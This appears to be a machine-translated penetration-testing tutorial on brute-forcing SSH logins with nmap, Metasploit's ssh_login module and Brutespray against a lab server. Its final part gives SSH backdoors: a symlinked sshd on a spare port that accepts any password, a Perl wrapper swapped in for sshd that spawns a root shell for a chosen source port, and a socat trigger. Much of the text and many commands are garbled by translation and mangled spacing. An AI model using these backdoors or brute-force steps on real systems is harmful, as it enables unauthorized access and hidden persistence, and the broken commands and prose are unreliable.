All SSH is an acronym for Secure Shell, developed by the IETF’s Network Working Group, SSH is a security protocol based on the application layer and transport layer. SSH is a protocol that provides security for remote login sessions and other network services. The SSH protocol can effectively prevent information leakage during remote management. SSH was originally a program on a UNIX system and later quickly expanded to other operating platforms. SSH can make up for vulnerabilities in the network when it is used correctly. The SSH client is available on multiple platforms. SSH can be run on almost all Unix platforms—including hp-Unix, Linux, Aix, Solaris, Digital Unix, and others.
The Kali Linux Penetration Test Platform defaults to the SSH service. SSH for remote server management, you only need to know the server’s IP address, port, management account and password, you can manage the server, network security follows the principle of wooden barrel, as long as you open a hole through SSH, this will be for infiltrators It is a new world.
The first is a key-based security verification that relies on a key, which means you have to create a pair of keys for yourself and put the public key on the server you need to access. If you are connecting to an SSH server, the client software will make a request to the server for security verification with your key. After the server receives the request, look for your public key in your home directory on the server and compare it to the public key you sent. If the two keys match, the server encrypts the “challenge” with the public key and sends it to the client software. After the client software receives the “challenge”, it can decrypt it with your private key and send it to the server.
The second is password-based security verification, as long as you know your account and password, you can log in to the remote host. All transmitted data will be encrypted, but there is no guarantee that the server you are connecting to is the one you want to connect to. There may be other servers that impersonate the real server, which is attacked by the “middleman”. At the same time, if the server has no other security restrictions, such as login source IP, account login error times, there may be violent cracking. However, SSH is not absolutely secure. If you do not restrict the login source IP and do not set the number of attempts to log in, it will be cracked.
The root permission is obtained through remote command execution such as Structs.
Get root privileges through web shell authorization
Through the local file contains the vulnerability, you can read all the files locally in linux.
Obtain the network access authority, which can access the intranet computer.
The SSH port is enabled on the external network (the default or modified port), and SSH access is available.
In the previous scenarios, you can get the shadow file and brute force it to get the password of these accounts, but in other scenarios, no loopholes are available. At this time, you need to brute the SSH account.
brute force the root account
use admin as the username to brute force
use the admin dictionary for password cracking
Using mastery information to organize social worker information and generate dictionary brute force cracking
Comprehensive utilization and recycling of information
Master the process of brute-breaking the SSH service through the ssh login module in Metasploit to finally obtain the password.
Guest operating system: Kali-linux 1.1, IP address is 193.168.1.100.
Server operating system: CentOS 6.5, address 193.168.1.26.
Tool software: Metasploit, NMAP.
Load the kali-linux virtual machine, open the kali system terminal, and use nmap to scan the target 193.168.1.26 port. The command is as follows: nmap - v -A -Pn 193.168.1.26, found that open 22 ports, you can try to brute force. The result is shown in Figure 1. NMAP scan resultsFigure 1.
Parameter Description:
-v: enable verbose mode;
-A: Detect the target operating system;
-Pn: Do not ping the target host to reduce the probability of being discovered or blocked by the guard device.
Open another new command line window, type ssh admin@193.168.1.26, enter the password arbitrarily, and the access is blocked. Try this process multiple times (3 times or more) and find that you can still try to enter the password, the user will not be locked, as shown in Figure 2, so all the conditions that satisfy the brute force vulnerability can be brute force cracked. Trying to log inFigure 2.
Use the ssh_login module in Metasploit to crack the crack, open the kali system terminal, and enter msfconsole, as shown in Figure 3. Start MetasploitFigure 3.
Enter search ssh_login and search for the ssh_login module, as shown in Figure 4. Searching for the ssh_login moduleFigure 4.
Enter use auxiliary/scanner/ssh/ssh_login to load the ssh_login module, as shown in Figure 5. Loading the ssh_login moduleFigure 5.
Enter show options to display the ssh_login module parameters, as shown in Figure 6. Ssh_login module parametersFigure 6.
Explanation of important parameters:
RHOST: the target host IP address;
PASS_FILE: brute force password dictionary storage path;
USERNAME: Specify the username used for brute force attack;
STOP_ON_SUCESS: Set to stop brute force attack immediately after cracking the password.
Set the relevant parameters of the brute force target host, as shown in Figure 7. Set the parametersFigure 7.
Enter the exploit to start brute force cracking, and successfully obtain the password, which is admin888, as shown in Figure 8. Execution attackFigure 8.
Open the terminal, enter ssh admin@193.168.1.26, and enter the cracked password to log in to the server, as shown in Figure 9. Successful login to the serverFigure 9.
Enter the command to view server related information, as shown in Figure 10. Execution system commandFigure 10.
Brutespray is a gnmap/XML file based on nmap scanning output. It calls Medusa automatically to explode the service faster than hydra. IBruteSpray calls medusa, which claims to support violent account cracking of ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin, smbnt, smtp, SVN and vmauthd protocols.
Brutespray is not integrated into Kali Linux by default. It needs to be installed manually. Some need to perform updates in Kali first, and apt-get update before executing the installation command:
Apt-get install brutespray
Kali Linux installs its user and password dictionary file location by default: / usr / share / brutespray / wordlist.
Git clone
CD brutes pray
PIP install-r requirements.txt
Note that if Medusa needs to be installed in other environments, otherwise an error will be executed.
Usage: brutespray.py[-h]-f FILE [-o OUTPUT] [-s SERVICE] [-t THREADS] [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME] [-p PASSWORD] [-c] [-i]
Usage: Python brutespray.py < Options >
Option parameters:
-h, --help displays help information and exits
Menu options:
-F FILE, -- File FILE parameter followed by a file name, parses the GNMAP or XML file output from nmap
-O OUTPUT, -- output OUTPUT contains the directory of successful attempts
-s SERVICE, --service SERVICE parameter followed by a service name specifies the service to be attacked
-t THREADS, --threads THREADS parameter followed by a value specifying the number of Medusa threads
-T HOSTS, - - hosts HOSTS parameter followed by a value specifying the number of hosts tested at the same time
-U USERLIST, --userlist USERLIST parameter followed by user dictionary file
-P PASSLIST - -- Passlist PASSLIST parameter followed by password dictionary file
-u USERNAME, -- username USERNAME parameter followed by user name, specify a user name for blasting
-P PASSWORD, --password PASSWORD parameter followed by password, specify a password for blasting
- C.-- Continuous blasting after success
- i --Interactive interaction mode
Python brutespray. py -- file nmap. XML - I
After execution, the program automatically identifies the services in the nmap scanning results, chooses the services that need to be cracked according to the prompt, the number of threads, the number of hosts that are simultaneously violently cracked, specifies the user and password files, and Brutespray will display the “SUCCESS” information on the screen after successful cracking.
ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=33223;
The classical backdoor uses SSH root@x.x.x-p 33223 to establish a soft connection to sshd directly, and then login with any password. But this is very weak, and protection scripts like Rookit hunter can be scanned.
CD/usr/sbin
MV sshd./bin
VI sshd//Add the following and save
#!/usr/bin/perl
Exec “/bin/sh” if (get peername (STDIN) = ~/^.. LF/);
Exec {“/usr/bin/sshd”}“/usr/sbin/sshd”, @ARGV;
Chmod 755 sshd
Socat STDIO TCP4: target_ip:22, sourceport = 19526
If socat is not installed, it needs to be installed and compiled
WGet
Tar-zxvf socat-1.7.3.2.tar.gz
CD socat-1.7.3.2
./configure
Make
Make install
The local computer generates the public and private keys, copies the public key files to the ~/.ssh/authorized_keys files on the servers that need to be connected, and sets the corresponding permissions to log on to the server without password.
Chmod 600 ~/.ssh/authorized_keys
By comparing the ssh brute force tests of the tools hydra, medusa, patator, brutepray and Metasploit, the summary is as follows:
Each software can successfully crack the ssh account and password.
Patator and brute spray are written in Python, but brutepray requires medusa support.
Hydra and medusa are written in C and need to be compiled.
Brutepray based on the results of nmap scan for brute force cracking, brute force effect after scanning the intranet.
Patator is based on python, fast, and compatible. It can be used in Windows or Linux.
If you have kali conditions or PentestBox, it is not bad to use Metasploit for ssh brute force cracking.
Brutespray will automatically generate the crack success log file /brutespray-output/ssh-success.txt; hydra plus parameter “-o save.log” record successfully cracked to the log file save.log, medusa plus “-O ssh.log The parameter can record the successfully cracked record into the ssh.log file; the patator can add the parameter “-x ignore:mesg=‘Authentication failed.’” to ignore the attempt to crack the failure, and only display the successful crack.